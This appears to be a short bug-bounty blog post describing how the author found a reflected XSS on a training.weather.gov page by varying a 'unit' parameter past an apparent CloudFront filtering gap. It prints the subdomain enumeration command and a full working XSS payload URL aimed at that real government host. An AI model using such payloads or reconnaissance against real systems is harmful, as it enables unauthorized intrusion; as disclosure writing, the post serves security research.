Bypassed the Amazon CloudFront Logic and got XSS at the National Weather Agency of the U.S.
Har Har Mahadev🔱. This is Prince roy, a security researcher also known as Royzsec. Back again with another blog about how I was able to bypass the Amazan Cloudfront firewall’s logic and get XSS [cross-site scripting]. Are you guys excited to know how I did it?
So, at first, I collected all the live subdomains of weather.gov via Subfinder and HTTPX.
subfinder -d weather.gov all | httpx -mc 200 | tee weather_live.txtBearly, I remember finding this XSS in the 9/10th subdomain. I lost that source code; otherwise, I could explain very easily what the logical error was in their CloudFront setting.
That was the domain [training.weather.gov]. I found the GET base RXSS on this page. When reading the source, they just used a lope where 1–6 PCU pages are showing. When I put :
https://training.weather.gov/pds/climate/index.php?unit=7I found nothing on that page
Then tried to find out the SQL injection, but that didn’t work. Because they are using Amazon CloudFront.
Moreover, I also tried :
https://training.weather.gov/pds/climate/index.php?unit=1%22%3EHello
https://training.weather.gov/pds/climate/index.php?unit=2%22%3EHello
https://training.weather.gov/pds/climate/index.php?unit=6%22%3EHello
https://training.weather.gov/pds/climate/index.php?unit=7%22%3EHello
Until ?unit=6 was protected by Amazan CloudFront. But whenever I put unit=7, it bypasses the logic and is reflected on the screen.
I was shocked to see that because it was unexpected because it was just a logical error. Then I put in the XSS payload, and guess what?
https://training.weather.gov/pds/climate/index.php?unit=7%27%22%3E%3CSvg%20Only=1%20OnLoad=confirm(atob(%22WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgUm95elNlYw==%22))%3E&tab=FUZZ
Boom! Got XSS. It was just a logical error. The developer made the mistake of building logic to retrieve the data from the database. After 4 days they accepted my report as a valid.
Finally, thanks for reading my small blog. If you like this, please share it with your friends and press the clap button for me, which inspires me a lot.
Please follow my social media platforms:
Linkedin: https://www.linkedin.com/in/prince-roy-4b9a75187/
Github: https://github.com/royzsec
Twitter: https://twitter.com/royzsec
